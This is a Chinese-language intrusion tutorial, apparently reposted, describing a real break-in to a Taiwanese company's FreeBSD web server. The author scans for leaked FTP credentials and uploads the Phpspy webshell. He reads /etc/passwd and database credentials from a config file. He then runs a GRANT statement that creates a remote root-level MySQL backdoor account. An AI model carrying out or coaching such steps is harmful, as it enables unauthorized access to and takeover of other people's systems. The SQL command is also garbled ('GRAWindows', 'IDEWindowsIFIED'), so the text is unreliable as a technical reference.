适合读者:FreeBSD爱好者、黑迷、网管 前置知识:FreeBSD基本命令,MYSQL基本操作
脚本小子:目前针对Windows+MSSQL或Windows+MYSQL的系统,在入侵方面的文章可算不少,大多通过脚本漏洞上传WebShell,通过Serv-U提升权限,再通过PcAnyWhere或终端连接器远程连接。就系统而言,大陆用Windows的比较多,港台和国外很多服务器都是用的Unix、Linux或FreeBSD系统。本文就是针对的FreeBSD+MYSQL+PHP系统,结合一个具体实例,讲解了一下入侵思路。其实作者的运气不错,遇到了一个大意的管理员――有多少服务器管理员是这样大意的呢?
MYSQL:入侵FreeBSD的桥梁
面对一个PHP网站的时候,我的个人习惯是先看看有没有PHP注入漏洞,然后再看是否存在整站漏洞,如Discuz!漏洞,PHPbb执行命令漏洞等等。如果存在的话,可以利用它们上传Webshell,如不存在的话在看看有没有其它的系统漏洞。这次遇上的是台湾某网络工司的服务器,页面很简洁,注入漏洞、脚本漏洞都不存在,无奈之下拿出红客联盟的HScan v1.20,大概扫描一下看看。扫描结果图1所示。
运气真不错,扫出一个FTP用户名和密码来,服务器还开了22(SSH),3306(MYSQL)两个重要端口。FTP登录,然后找一个可以上传的WEB目录上传Phpspy.php,如图2所示。
在浏览器里输入http://211.***.***.91/e***u/lib/phpspy.php,进入Phpspy.php的 “WebShell模式”键入命令:id //查看当前用户:
uid=65534(nobody) gid=65533(nogroup) groups=65533(nogroup)
键入命令:uname a //查看系统:
FreeBSD www.e******u.com 4.3-STABLE FreeBSD 4.3-STABLE #0: Fri May 25 11:10:00 CST 2001 Root@www.e******u.com:/home/usr/src/sys/compile/GENERIC i386
键入命令:cat /etc/passwd //读取密码档
# $FreeBSD: src/etc/master.passwd,v 1.25 1999/09/13 17:09:07 peter Exp $
#
Root:*:0:0:Charlie &:/Root:/bin/csh
games:*:7:13:Games pseudo-user:/usr/games:/sbin/nologin
news:*:8:8:News Subsystem:/:/sbin/nologin
nobody:*:65534:65534:Unprivileged user:/nonexistent:/sbin/nologin
mysql:*:88:88:MySQL Daemon:/home/db/mysql:/sbin/nologin
www:*:2000:2000:WWW Administrator:/home/www/main:/bin/tcsh
chat:*:2001:2000:Chat Administrator:/home/www/chat:/bin/tcsh
game:*:2002:2000:Game Administrator:/home/www/game:/bin/tcsh
elife:*:2003:2000:eLife Administrator:/home/www/elife:/bin/tcsh
game-tnid:*:1005:0:game-tnid:/home/game-tnid:/bin/tcsh
cyc:*:1010:0:cyc:/home/cyc:/bin/tcsh
webadm:*:1012:1012:webadm:/home/webadm:/bin/tcsh
funker:*:1014:1014:funker:/home/funker:/bin/tcsh
小提示:FreeBSD的密码加密后存放在/etc/master.passwd文件下,而不像Unix 一样存放在/etc/shadow文件下,而且此文件只有Root用户可以读。
通过文件Globalvar.inc读取数据库信息如下:
$ethink4u_db = "web123"; // database info
$ethink4u_db_user = "Root";
$ethink4u_db_passwd = "";
$ethink4u_db_host = "localhost";
进入Phpspy.php的“SQL的查询”页面,连接数据库,连接的数据名不是上面的“web123”而是“mysql”,连接成功后,输入如下命令:
GRAWindows ALL PRIVILEGES ON *.* TO system@'%'IDEWindowsIFIED BY 'askyou' WITH GRAWindows OPTION
一个远程的具有Root权限的用户“system”,密码为:“askyou”就建成了!这样就可以通过牛族MYSQL连接器远程连接,整个数据库的生杀大权就掌握在你的手中了!
--转自